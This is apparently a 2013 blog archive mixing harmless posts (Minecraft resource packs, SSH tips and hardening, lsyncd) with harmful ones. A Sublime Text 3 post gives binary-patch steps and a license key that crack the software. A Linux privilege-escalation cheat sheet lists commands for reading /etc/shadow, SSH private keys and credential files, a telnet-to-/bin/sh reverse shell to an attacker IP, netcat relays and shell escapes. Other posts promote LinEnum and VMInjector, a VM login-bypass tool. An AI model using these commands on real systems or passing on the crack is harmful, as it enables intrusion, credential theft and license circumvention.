Month: 10 月 2013

关于Minecraft 1.7.2 服务端资源包的几点说明

by Orange

刚刚更新的Minecraft 1.7.2 多了一个很不错的新功能就是服务端可以推荐资源包了。

这样用户无需自己寻找,就可以自动下载安装服务端设置的资源包,可以保证所有用户都使用同样的资源,有相同的体验。

但是在测试这项功能的时候遇到了几个问题,这里写出来给大家参考一下。

1.在server.properties文件中resource-pack= 之后要填写的是完整的资源包下载地址。比如说我的博客下放了一个资源包叫mc.zip,那么这行就应该填写

resource-pack=http://maoxian.de/mc.zip

2.资源包的下载地址有几点需要注意,首先,不能是HTTPS链接,因为MC没法处理使用SSL的链接。其次,该链接必须是直链,不允许有个页面然后点击下载之类的。最后,该链接必须没有防盗链。如果设置了防盗链禁用了无UA或者除了某些UA都禁止下载的话,可能MC没法下载到资源包。

3.资源包的大小必须小于52428800字节,也就是50M。这是MC使用的Java IO函数的处理大小上限,如果资源包超过此上限会直接报错不进行下载。

4.都设置成功后,用户第一次进入游戏如果选择了自动下载并使用资源包,则系统会自动下载,然后自动启用该资源包。但是!该资源包不会在设置中的资源包菜单中显示!不能应用给别的服务器或者单机世界!只能在本服务器使用!而且,每次进服的时候都会加载一次这个资源包,所以如果资源包较大会卡顿很久。而每次退出服务器都会换回之前的资源包,如果之前不是默认资源包的话又会卡顿很久。

综上,本次跟新的这个新特性可以说是一把双刃剑,有好处但是坏处也不少。各位腐竹在设置的时候记得三思~

Sublime 3 Licensed (Sublime 3 Public Beta)

by Orange

Go to this link and Download your OS Specific Build:

http://www.sublimetext.com/3

Mac OS X

Open Terminal and Type the following:

1. cd /Applications/Sublime\ Text.app/Contents/MacOS/
2. Now Type  “vim Sublime\ Text″
3. Now Change to hex mode in vim by doing this =>  “:$!xxd”
4. Now we will do find and replace ->> “:%s/5BE509C33B020111/5BE509C32B020111/g”

Now open the sublime and enter the below licence key , it should work like a charm.

WINDOWS

For x64: After install, open sublime-text.exe with hex editor. Find and replace “33 42″ with “32 42″. Save and using this license key to register:

—–BEGIN LICENSE—–
Patrick Carey
Unlimited User License
EA7E-18848
4982D83B6313800EBD801600D7E3CC13
F2CD59825E2B4C4A18490C5815DF68D6
A5EFCC8698CFE589E105EA829C5273C0
C5744F0857FAD2169C88620898C3845A
1F4521CFC160EEC7A9B382DE605C2E6D
DE84CD0160666D30AA8A0C5492D90BB2
75DEFB9FD0275389F74A59BB0CA2B4EF
EA91E646C7F2A688276BCF18E971E372
—–END LICENSE—–

You should copy from Begin License till End License.

UBUNTU:

Follow these to register sublime text 3 in ubuntu
1.Install ghex editor.(in terminal,enter “sudo apt-get install ghex”)..without the quotes.
2.In terminal enter “cd /usr/lib/sublime-text″
3.In terminal enter “sudo ghex sublime_text” & enter your password
4.In open ghex window,navigate to Edit>Replace.
5.In the find string section enter 33 42
6.In the replace with section enter 32 42
7.save and exit.

 

Screen Shot 2013-06-28 at 10.05.24 PM

9 Awesome SSH Tricks

by Orange

Sorry for the lame title. I was thinking the other day, about how awesome SSH is, and how it’s probably one of the most crucial pieces of technology that I use every single day. Here’s a list of 10 things that I think are particularly awesome and perhaps a bit off the beaten path.

Update: (2011-09-19) There are some user-submitted ssh-tricks on the wiki now! Please feel free to add your favorites. Also the hacker news thread might be helpful for some.

SSH Config

I used SSH regularly for years before I learned about the config file, that you can create at ~/.ssh/config to tell how you want ssh to behave.

Consider the following configuration example:

  Host example.com *.example.net
     User root
  Host dev.example.net dev.example.net 
     User shared
     Port 220 
  Host test.example.com 
     User root
     UserKnownHostsFile /dev/null
     StrictHostKeyChecking no
  Host t
     HostName test.example.org
  Host *
     Compression yes
     CompressionLevel 7
     Cipher blowfish
     ServerAliveInterval 600
     ControlMaster auto
     ControlPath /tmp/ssh-%r@%h:%p

I’ll cover some of the settings in the “Host *” block, which apply to all outgoing ssh connections, in other items in this post, but basically you can use this to create shortcuts with the ssh command, to control what username is used to connect to a given host, what port number, if you need to connect to an ssh daemon running on a non-standard port. See “man ssh_config” for more information.

Control Master/Control Path

This is probably the coolest thing that I know about in SSH. Set the “ControlMaster” and “ControlPath” as above in the ssh configuration. Anytime you try to connect to a host that matches that configuration a “master session” is created. Then, subsequent connections to the same host will reuse the same master connection rather than attempt to renegotiate and create a separate connection. The result is greater speed less overhead.

This can cause problems if you’ want to do port forwarding, as this must be configured on the original connection, otherwise it won’t work.

SSH Keys

While ControlMaster/ControlPath is the coolest thing you can do with SSH, key-based authentication is probably my favorite. Basically, rather than force users to authenticate with passwords, you can use a secure cryptographic method to gain (and grant) access to a system. Deposit apublic key on servers far and wide, while keeping a “private” key secure on your local machine. And it just works.

You can generate multiple keys, to make it more difficult for an intruder to gain access to multiple machines by breaching a specific key, or machine. You can specify specific keys and key files to be used when connected to specific hosts in the ssh config file (see above.) Keys can also be (optionally) encrypted locally with a pass-code, for additional security. Once I understood how secure the system is (or can be), I found my self thinking “I wish you could use this for more than just SSH.”

SSH Agent

Most people start using SSH keys because they’re easier and it means that you don’t have to enter a password every time that you want to connect to a host. But the truth is that in most cases you want to have unencrypted private keys that have meaningful access to systems because once someone has access to a copy of the private key the have full access to the system. That’s not good.

But the truth is that typing in passwords is a pain, so there’s a solution: the ssh-agent. Basically one authenticates to the ssh-agent locally, which decrypts the key and does some magic, so that then whenever the key is needed for the connecting to a host you don’t have to enter your password. ssh-agent manages the local encryption on your key for the current session.

SSH Reagent

I’m not sure where I found this amazing little function but it’s great. Typically, ssh-agents are attached to the current session, like the window manager, so that when the window manager dies, the ssh-agent loses the decrypted bits from your ssh key. That’s nice, but it also means that if you have some processes that exist outside of your window manager’s session (e.g. Screen sessions) they loose the ssh-agent and get trapped without access to an ssh-agent so you end up having to restart would-be-persistent processes, or you have to run a large number ofssh-agents which is not ideal.

Enter “ssh-reagent.” stick this in your shell configuration (e.g. ~/.bashrc or ~/.zshrc) and run ssh-reagent whenever you have an agent session running and a terminal that can’t see it.

  ssh-reagent () {
          for agent in /tmp/ssh-*/agent.*; do
                 export SSH_AUTH_SOCK=$agent
                 if ssh-add -l 2>&1 > /dev/null; then
                         echo Found working SSH Agent:
                         ssh-add -l
                         return
                 fi
         done
         echo Cannot find ssh agent - maybe you should reconnect and forward it?
  }

It’s magic.

SSHFS and SFTP

Typically we think of ssh as a way to run a command or get a prompt on a remote machine. But SSH can do a lot more than that, and the OpenSSH package that probably the most popular implementation of SSH these days has a lot of features that go beyond just “shell” access. Here are two cool ones:

SSHFS creates a mountable file system using [FUSE][] of the files located on a remote system over SSH. It’s not always very fast, but it’s simpleand works great for quick operations on local systems, where the speed issue is much less relevant.

SFTP, replaces FTP (which is plagued by security problems,) with a similar tool for transferring files between two systems that’s secure (because it works over SSH) and is just as easy to use. In fact most recent OpenSSH daemons provide SFTP access by default.

There’s more, like a full VPN solution in recent versions, secure remote file copy, port forwarding, and the list could go on.

SSH Tunnels

SSH includes the ability to connect a port on your local system to a port on a remote system, so that to applications on your local system the local port looks like a normal local port, but when accessed the service running on the remote machine responds. All traffic is really sent over ssh.

I set up an SSH tunnel for my local system to the outgoing mail server on my server. I tell my mail client to send mail to localhost server (without mail server authentication!), and it magically goes to my personal mail relay encrypted over ssh. The applications of this are nearly endless.

Keep Alive Packets

The problem: unless you’re doing something with SSH it doesn’t send any packets, and as a result the connections can be pretty resilient to network disturbances. That’s not a problem, but it does mean that unless you’re actively using an SSH session, it can go silent causing your local area network’s NAT to eat a connection that it thinks has died, but hasn’t. The solution is to set the “ServerAliveInterval [seconds]” configuration in the SSH configuration so that your ssh client sends a “dummy packet” on a regular interval so that the router thinks that the connection is active even if it’s particularly quiet. It’s good stuff.

/dev/null .known_hosts

A lot of what I do in my day job involves deploying new systems, testing something out and then destroying that installation and starting over in the same virtual machine. So my “test rigs” have a few IP addresses, I can’t readily deploy keys on these hosts, and every time I redeploy SSH’s host-key checking tells me that a different system is responding for the host, which in most cases is the symptom of some sort of security error, and in most cases knowing this is a good thing, but in some cases it can be very annoying.

These configuration values tell your SSH session to save keys to `/dev/null (i.e. drop them on the floor) and to not ask you to verify an unknown host:

 UserKnownHostsFile /dev/null
 StrictHostKeyChecking no

This probably saves me a little annoyance and minute or two every day or more, but it’s totally worth it. Don’t set these values for hosts that you actually care about.

I’m sure there are other awesome things you can do with ssh, and I’d live to hear more. Onward and Upward!

Keep an Eye on SSH Forwarding!

by Orange

OpenSSH is a wonderful tool box. The main purpose is to establish encrypted connections (SSH means Secure SHell) on a remote UNIX machine and, once authenticated, to spawn a shell to perform remote administration. Running on port 22 (default), the client (ssh) and the server (sshd) exchange encrypted information (what you type and the result of your command). I’ll not review the long list of options available with SSH but let’s focus on a particular feature: tunneling.

By default, sshd (the server) has the flag AllowTcpForwarding turned on (I won’t start a debate here about this default setting). “TCP Forwarding” allows you to encapsulate any other protocol (based on TCP of course) inside an already established SSH connection. It’s very useful to increase the security of any unsecured protocol exchanging data in clear text (example: to check a mailbox via the POP3 or IMAP protocol). TCP Forwarding is also a common way to “hide” your activity on the network. Here is an example:

# ssh -f -N -L 1100:localhost:110 -f user@pop3.company.com
user@pop3.company.com's password: 
# telnet localhost 1100
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
+OK Solid POP3 server ready
quit
+OK session ended
Connection closed by foreign host.

If you want to read more about tunnels, check the following tutorial.

But the ssh client has a much more interesting feature: dynamic port forwarding. When you connect to the remote host and specify a”-D ” argument, the remote ssh server acts as a SOCKS proxy! Example:

# ssh -f -N -D 9001 user@server.company.com

Starting from now, all applications compatible with SOCKS proxies can use the proxy running on 127.0.0.1:9999! Here is an example on FireFox:

firefox-proxy

Click to enlarge

Configured like this, your FireFox will send all HTTP traffic though the remote server via the SSH session. The server will connect to the final website and send the HTTP requests. Really nice! But there are some security concerns:

  • The UNIX server will generate a lot of traffic from the Internet. There is a risk of high resources consumption (bandwidth and/or CPU).
  • As connections will originate from the UNIX server itself, the logged IP address on remote services will be the one of the UNIX server. There is a risk in case of abuse (hidden IP address).
  • By default, the SSH daemon permits all protocols to be forwarded. Some users may abuse your security policy by encapsulating unexpected protocols (Instant Messenging is a good example).

Here follows some steps to use the SSH tunnel in a safe way. First of all, if you don’t really need this feature, disable it! In /etc/ssh/sshd_config, set AllowTcpForwarding to off and restart the sshd process.

Logging

By default, the SSH daemon does not log the sessions established via a tunnel. To show them, you need to run the sshd in debug mode (-d). This is not acceptable in an operational environment. Here is a quick patch to log all outgoing sessions initiated by the sshd with a mapping to the UID (UserID). In serverloop.c, patch the function server_request_direct_tcpip() like this:

915,918d914
<  // BEGIN PATCH TunnelLogging
<  uid_t who;
<  // END PATCH
<
925,930c921,922
<  // BEGIN PATCH TunnelLogging
<  // debug("server_request_direct_tcpip: originator %s port %d, target %s port %d",
<  who = getuid();
<    logit("Tunnel: %s:%d -> %s:%d UID(%d)",
<      originator, originator_port, target, target_port, who);
<  // END PATCH
---
>  debug("server_request_direct_tcpip: originator %s port %d, target %s port %d",
>      originator, originator_port, target, target_port);

For each new TCP session, the following line will be sent to Syslog:

Feb 27 08:03:08 honey sshd[9060]: Tunnel: 127.0.0.1:51209 -> 0.channel26.facebook.com:80 UID(2349)

The patch will allow to correlate who connected and from which IP address.

Restricting the allowed ports

By default, sshd allow to forward TCP sessions to any ports. You can restrict them to specific hosts and/or ports via the PermitOpen parameter (available since release 4.4):

PermitOpen host:port
PermitOpen IPv4_addr:port
PermitOpen [IPv6_addr]:port

Another alternative is to use the local firewall – iptables – to restrict connection initiated by the UNIX server.

Restricting the allowed users or groups

Now that hosts and ports are restricted, it can be useful to restrict who can use the port forwarding feature. Back to the sshd_config man page, let’s have a look at the Match keyword:

Introduces a conditional block. If all of the criteria on the Match line are satisfied, the keywords on the following lines override those set in the global section of the config file, until either another Match line or the end of the file. The arguments to Match are one or more criteria-pattern pairs. The available criteria are User, Group, Host, and Address. Only a subset of keywords may be used on the lines following a Match keyword. Available keywords are AllowTcpForwarding, Banner, ForceCommand, GatewayPorts, GSSApiAuthentication, KbdInteractiveAuthentication, KerberosAuthentication, PasswordAuthentication, PermitOpen, RhostsRSAAuthentication, RSAAuthentication, X11DisplayOffset, X11Forwarding, and X11UseLocalHost.

Here are some example. First let’s restrict the users who are allowed to forward TCP sessions:

AllowTcpForwarding no
Match User john,andy,ted
AllowTcpForwarding yes

Or better, allow specific ports per user groups:

AllowTcpForwarding no
Match Group admins
AllowTcpForwarding yes
Match User john,andy,ted
AllowTcpForwarding yes
PermitOpen 192.168.0.1:443

With this configuration, administrators will be able to open unrestricted connections, specific users will be able to open an IMAP session to a single server and all remaining users won’t be allowed to create tunnels.

Restricting the server Internet connectivity

Finally, restrict the Internet connectivity of your server! Even if you don’t allow TCP Forwarding, it’s a good idea. A server should never have a full direct Internet connectivity. Close everything and open connectivity depending on the needs (example: download some patches via HTTP(S) from specific servers).

使用 lsyncd 同步本地和远程目录

by Orange

自动同步本地服务器(或 VPS)上的目录到另一台或多台远程服务器的办法和工具有很多,最简单的办法可能是用 rsync + cron(参考:用 VPS 给博客做镜像),这种办法有个问题就是 rsync 只能在固定时间间隔里被 cron 调用,如果时间间隔设的太短,频繁 rsync 会增加服务器负担;如果时间间隔设的太长,可能数据不能及时同步。今天介绍的 lsyncd 采用了 Linux 内核(2.6.13 及以后)里的 inotify 触发机制,这种机制可以做到只有在需要(变化)的时候才去同步。lsyncd 密切监测本地服务器上的参照目录,当发现目录下有文件或目录变更后,立刻通知远程服务器,并通过 rsync 或 rsync+ssh 方式实现文件同步。lsyncd 默认同步触发条件是每20秒或者每积累到1000次写入事件就触发一次,当然,这个触发条件可以通过配置参数调整。

lsyncd 已经在 Ubuntu 的官方源里,安装很容易:

$ sudo apt-get update
$ sudo apt-get install lsyncd

lsyncd 安装后没有自动生成所需要的配置文件和目录,需要手动创建:

$ sudo mkdir /etc/lsyncd
$ sudo touch /etc/lsyncd/lsyncd.conf.lua

$ sudo mkdir /var/log/lsyncd
$ sudo touch /var/log/lsyncd/lsyncd.{log,status}

配置 lsyncd,注意 source, host, targetdir 部分,依次是本地需要同步到远程的目录(源头),远程机器的 IP,远程目录(目标):

$ sudo vi /etc/lsyncd/lsyncd.conf.lua
settings {
        logfile = "/var/log/lsyncd/lsyncd.log",
        statusFile = "/var/log/lsyncd/lsyncd.status"
}

sync {
        default.rsyncssh,
        source = "/home/vpsee/local",
        host = "192.168.2.5",
        targetdir = "/remote"
}

配置本地机器和远程机器 root 帐号无密码 ssh 登陆,并在远程机器上(假设 IP 是 192.168.2.5)创建一个 /remote 目录:

$ sudo su
# ssh-keygen -t rsa
# ssh-copy-id root@192.168.2.5

# ssh 192.168.2.5
# mkdir /remote

配置好后就可以在本地机器上启动 lsyncd 服务了,启动服务后本地机器 /home/vpsee/local 下的目录会自动同步到远程机器的 /remote 目录下:

$ sudo service lsyncd restart

除了同步本地目录到远程目录外,lsyncd 还可以轻松做到同步本地目录到本地另一目录,只要修改配置文件就可以了:

$ sudo vi /etc/lsyncd/lsyncd.conf.lua
settings {
        logfile = "/var/log/lsyncd/lsyncd.log",
        statusFile = "/var/log/lsyncd/lsyncd.status"
}

sync {
	default.rsync,
	source = "/home/vpsee/local",
	target = "/localbackup"
}

$ sudo service lsyncd restart

Linux主机本地信息自动采集工具(渗透测试必备)

by Orange

1

LinEnum是一个Linux主机本地信息自动提取的shell脚本,它有超过65项安全检查功能,比如潜在的SUID/GUID文件、Sudo/rhost错误配置等。另外这个脚本还可以根据关键字(比如Password)搜索*.conf和*.log文件,这些功能对于渗透测试人员来说,是非常有用的。

主要功能:

 

1.内核和发行版本
2.系统信息:
主机名
3.网络信息:
IP
路由信息
DNS服务器信息
4.用户信息:
当前用户信息
最近登录用户
枚举所有用户,包括uid/gid信息
列举root账号
检查/etc/passwd中的hash
当前用户操作记录 (i.e .bash_history, .nano_history etc.)
5.版本信息:
Sudo
MYSQL
Postgres
Apache

2

下载地址

Linux提权后获取敏感信息的方法与途径

by Orange

在本文开始之前,我想指出我不是专家。据我所知,在这个庞大的区域,没有一个“神奇”的答案.分享,共享(我的出发点)。下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物。我知道有更多的“东西”去寻找。这只是一个基本粗略的指南。并不是每一个命令,做好要注重细节.

文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的linux中所使用的命令。

列举关键点
(Linux)的提权是怎么一回事:

  • 收集 – 枚举,枚举和一些更多的枚举。
  • 过程 – 通过数据排序,分析和确定优先次序。
  • 搜索 – 知道搜索什么和在哪里可以找到漏洞代码。
  • 适应 – 自定义的漏洞,所以它适合。每个系统的工作并不是每一个漏洞“都固定不变”。
  • 尝试 – 做好准备,试验和错误。
  • 操作类型

操作类型是什么版本?

1 cat /etc/issue
2 cat /etc/*-release
3 cat /etc/lsb-release
4 cat /etc/redhat-release

它的内核版本是什么?

1 cat /proc/version  
2 uname -a
3 uname -mrs
4 rpm -q kernel
5 dmesg | grep Linux
6 ls /boot | grep vmlinuz

它的环境变量里有些什么?

1 cat /etc/profile
2 cat /etc/bashrc
3 cat ~/.bash_profile
4 cat ~/.bashrc
5 cat ~/.bash_logout
6 env
7 set

是否有台打印机?

1 lpstat -a
  • 应用与服务

正在运行什么服务?什么样的服务具有什么用户权限?

1 ps aux
2 ps -ef
3 top
4 cat /etc/service

哪些服务具有root的权限?这些服务里你看起来那些有漏洞,进行再次检查!

1 ps aux | grep root
2 ps -ef | grep root

安装了哪些应用程序?他们是什么版本?哪些是当前正在运行的?

1 ls -alh /usr/bin/
2 ls -alh /sbin/
3 dpkg -l
4 rpm -qa
5 ls -alh /var/cache/apt/archivesO
6 ls -alh /var/cache/yum/

Service设置,有任何的错误配置吗?是否有任何(脆弱的)的插件?

01 cat /etc/syslog.conf
02 cat /etc/chttp.conf
03 cat /etc/lighttpd.conf
04 cat /etc/cups/cupsd.conf
05 cat /etc/inetd.conf
06 cat /etc/apache2/apache2.conf
07 cat /etc/my.conf
08 cat /etc/httpd/conf/httpd.conf
09 cat /opt/lampp/etc/httpd.conf
10 ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

主机上有哪些工作计划?

01 crontab -l
02 ls -alh /var/spool/cron
03 ls -al /etc/ | grep cron
04 ls -al /etc/cron*
05 cat /etc/cron*
06 cat /etc/at.allow
07 cat /etc/at.deny
08 cat /etc/cron.allow
09 cat /etc/cron.deny
10 cat /etc/crontab
11 cat /etc/anacrontab
12 cat /var/spool/cron/crontabs/root

主机上可能有哪些纯文本用户名和密码?

1 grep -i user [filename]
2 grep -i pass [filename]
3 grep -C 5 "password" [filename]
4 find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla
  • 通信与网络

NIC(s),系统有哪些?它是连接到哪一个网络?

1 /sbin/ifconfig -a
2 cat /etc/network/interfaces
3 cat /etc/sysconfig/network

网络配置设置是什么?网络中有什么样的服务器?DHCP服务器?DNS服务器?网关?

1 cat /etc/resolv.conf
2 cat /etc/sysconfig/network
3 cat /etc/networks
4 iptables -L
5 hostname
6 dnsdomainname

其他用户主机与系统的通信?

01 lsof -i
02 lsof -i :80
03 grep 80 /etc/services
04 netstat -antup
05 netstat -antpx
06 netstat -tulpn
07 chkconfig --list
08 chkconfig --list | grep 3:on
09 last
10 w

缓存?IP和/或MAC地址?

1 arp -e
2 route
3 /sbin/route -nee

数据包可能嗅探吗?可以看出什么?监听流量

1 # tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
2 tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21

你如何get一个shell?你如何与系统进行交互?

# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

1 nc -lvp 4444    # Attacker. 输入 (命令)
2 nc -lvp 4445    # Attacker. 输出(结果)

telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # 在目标系统上. 使用 攻击者的IP!

如何端口转发?(端口重定向)

# rinetd

# fpipe

1 # FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
2 FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

#ssh

1 # ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
2 ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
3 ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port

#mknod

1 # mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe
2 mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe    # Port Relay
3 mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
4 mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

建立隧道可能吗?本地,远程发送命令

1 ssh -D 127.0.0.1:9050 -N [username]@[ip]
2 proxychains ifconfig
  • 秘密信息和用户

你是谁?哪个id登录?谁已经登录?还有谁在这里?谁可以做什么呢?

1 id
2 who
3 w
4 last
5 cat /etc/passwd | cut -d:    # List of users
6 grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
7 awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
8 cat /etc/sudoers
9 sudo -l

可以找到什么敏感文件?

1 cat /etc/passwd
2 cat /etc/group
3 cat /etc/shadow
4 ls -alh /var/mail/

什么有趣的文件在home/directorie(S)里?如果有权限访问

1 ls -ahlR /root/
2 ls -ahlR /home/

是否有任何密码,脚本,数据库,配置文件或日志文件?密码默认路径和位置

1 cat /var/apache2/config.inc
2 cat /var/lib/mysql/mysql/user.MYD
3 cat /root/anaconda-ks.cfg

用户做过什么?是否有任何密码呢?他们有没有编辑什么?

1 cat ~/.bash_history
2 cat ~/.nano_history
3 cat ~/.atftp_history
4 cat ~/.mysql_history
5 cat ~/.php_history

可以找到什么样的用户信息

1 cat ~/.bashrc
2 cat ~/.profile
3 cat /var/mail/root
4 cat /var/spool/mail/root

private-key 信息能否被发现?

01 cat ~/.ssh/authorized_keys
02 cat ~/.ssh/identity.pub
03 cat ~/.ssh/identity
04 cat ~/.ssh/id_rsa.pub
05 cat ~/.ssh/id_rsa
06 cat ~/.ssh/id_dsa.pub
07 cat ~/.ssh/id_dsa
08 cat /etc/ssh/ssh_config
09 cat /etc/ssh/sshd_config
10 cat /etc/ssh/ssh_host_dsa_key.pub
11 cat /etc/ssh/ssh_host_dsa_key
12 cat /etc/ssh/ssh_host_rsa_key.pub
13 cat /etc/ssh/ssh_host_rsa_key
14 cat /etc/ssh/ssh_host_key.pub
15 cat /etc/ssh/ssh_host_key
  • 文件系统

哪些用户可以写配置文件在/ etc /?能够重新配置服务?

1 ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
1 ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null        # Owner
1 ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
1 ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null          # Other
1 find /etc/ -readable -type f 2>/dev/null                         # Anyone
2 find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

在/ var /有什么可以发现?

1 ls -alh /var/log
2 ls -alh /var/mail
3 ls -alh /var/spool
4 ls -alh /var/spool/lpd
5 ls -alh /var/lib/pgsql
6 ls -alh /var/lib/mysql
7 cat /var/lib/dhcp3/dhclient.leases

网站上的任何隐藏配置/文件?配置文件与数据库信息?

1 ls -alhR /var/www/
2 ls -alhR /srv/www/htdocs/
3 ls -alhR /usr/local/www/apache22/data/
4 ls -alhR /opt/lampp/htdocs/
5 ls -alhR /var/www/html/

有什么在日志文件里?(什么能够帮助到“本地文件包含”?)

# http://www.thegeekstuff.com/2011/08/linux-var-log-files/

01 cat /etc/httpd/logs/access_log
02 cat /etc/httpd/logs/access.log
03 cat /etc/httpd/logs/error_log
04 cat /etc/httpd/logs/error.log
05 cat /var/log/apache2/access_log
06 cat /var/log/apache2/access.log
07 cat /var/log/apache2/error_log
08 cat /var/log/apache2/error.log
09 cat /var/log/apache/access_log
10 cat /var/log/apache/access.log
11 cat /var/log/auth.log
12 cat /var/log/chttp.log
13 cat /var/log/cups/error_log
14 cat /var/log/dpkg.log
15 cat /var/log/faillog
16 cat /var/log/httpd/access_log
17 cat /var/log/httpd/access.log
18 cat /var/log/httpd/error_log
19 cat /var/log/httpd/error.log
20 cat /var/log/lastlog
21 cat /var/log/lighttpd/access.log
22 cat /var/log/lighttpd/error.log
23 cat /var/log/lighttpd/lighttpd.access.log
24 cat /var/log/lighttpd/lighttpd.error.log
25 cat /var/log/messages
26 cat /var/log/secure
27 cat /var/log/syslog
28 cat /var/log/wtmp
29 cat /var/log/xferlog
30 cat /var/log/yum.log
31 cat /var/run/utmp
32 cat /var/webmin/miniserv.log
33 cat /var/www/logs/access_log
34 cat /var/www/logs/access.log
1 ls -alh /var/lib/dhcp3/
2 ls -alh /var/log/postgresql/
3 ls -alh /var/log/proftpd/
4 ls -alh /var/log/samba/
5 # auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp(有什么文件?log.系统引导......)

如果命令限制,你可以打出哪些突破它的限制?

1 python -c 'import pty;pty.spawn("/bin/bash")'
1 echo os.system('/bin/bash')
1 /bin/sh -i

如何安装文件系统?

1 mount
2 df -h

是否有挂载的文件系统?

1 cat /etc/fstab

什么是高级Linux文件权限使用?Sticky bits, SUID 和GUID

1 find / -perm -1000 -type d 2>/dev/null    # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
2 find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the  group, not the user who started it.
3 find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the  owner, not the user who started it.
4 find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
5 for i in `locate -r "bin$"`; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
6
7 # findstarting at root (/), SGIDorSUID, not Symbolic links, only 3 folders deep, list with more detail and hideany errors (e.g. permission denied)
8
9 find/-perm -g=s-o-perm -4000! -type l-maxdepth 3 -exec ls -ld {} ;2>/dev/null

在哪些目录可以写入和执行呢?几个“共同”的目录:/ tmp目录,/var / tmp目录/ dev /shm目录

1 find / -writable -type d 2>/dev/null        # world-writeable folders
2 find / -perm -222 -type d 2>/dev/null      # world-writeable folders
3 find / -perm -o+w -type d 2>/dev/null    # world-writeable folders
4 find / -perm -o+x -type d 2>/dev/null    # world-executable folders
5 find / ( -perm -o+w -perm -o+x ) -type d 2>/dev/null   # world-writeable & executable folders
6 Any "problem" files?可写的的,“没有使用"的文件
7 find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print   # world-writeable files
8 find /dir -xdev ( -nouser -o -nogroup ) -print   # Noowner files
  • 准备和查找漏洞利用代码

安装了什么开发工具/语言/支持?

1 find / -name perl*
2 find / -name python*
3 find / -name gcc*
4 find / -name cc

如何上传文件?

1 find / -name wget
2 find / -name nc*
3 find / -name netcat*
4 find / -name tftp*
5 find / -name ftp

查找exploit代码

http://www.exploit-db.com

http://1337day.com

http://www.securiteam.com

http://www.securityfocus.com

http://www.exploitsearch.net

http://metasploit.com/modules/

http://securityreason.com

http://seclists.org/fulldisclosure/

http://www.google.com

查找更多有关漏洞的信息

http://www.cvedetails.com

http://packetstormsecurity.org/files/cve/[CVE]

http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]]http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]

http://www.vulnview.com/cve-details.php?cvename=[CVE]]http://www.vulnview.com/cve-details.php?cvename=[CVE]

http://www.91ri.org/

(快速)“共同的“exploit,预编译二进制代码文件

http://tarantula.by.ru/localroot/

http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

上面的信息很难吗?

快去使用第三方脚本/工具来试试吧!

系统怎么打内核,操作系统,所有应用程序,插件和Web服务的最新补丁?

1 apt-get update && apt-get upgrade
2 yum update

服务运行所需的最低的权限?

例如,你需要以root身份运行MySQL?

能够从以下网站找到自动运行的脚本?!

unix-privesc-check

http://labs.portcullis.co.uk/application/enum4linux/

http://bastille-linux.sourceforge.net

  • (快速)指南和链接

例如

http://www.0daysecurity.com/penetration-testing/enumeration.html

http://www.microloft.co.uk/hacking/hacking3.htm

其他

http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf

http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf

http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html

相关文章《linux下的基本渗透方法-实战》《总结Linux的一些渗透技巧

绕过VMware虚拟机登录认证神器—VMInjector

by Orange

VMInjector是一个绕过VMware Wordstation/Player上虚拟机登录认证的工具.支持当前大部分主流操作系统。它的原理是直接操作内存的方式来绕过登录认证。所以这种内存补丁的方式是不持久的,虚拟机重启之后会恢复正常的密码验证功能。

利用条件:

 

1, 宿主机需要是windows(有管理员权限)
2, 虚拟化软件是VMware workstation或者player
3, 存在锁定的虚拟机

 

支持的版本:

宿主机支持32位和64位的windows,虚拟机支持win7,xin xp,MAC OS X,ubuntu大部分版本.

在64位win7主机,vmware 7.1.0,32位xp虚拟机测试通过

下载地址

 

测试心得:

github提供的源码中是用python脚本来注入DLL,我用python2.7.5,psutil模块1.1最新版,遍历主机进程的时候存在
权限不够的问题.(貌似是psutil模块问题?).而且测试了多次都是注入失败.后来发现作者博客里演示的时候用的是编译好的exe.这两个exe在
github上也有,只是后来被作者删掉了.不知道为什么.

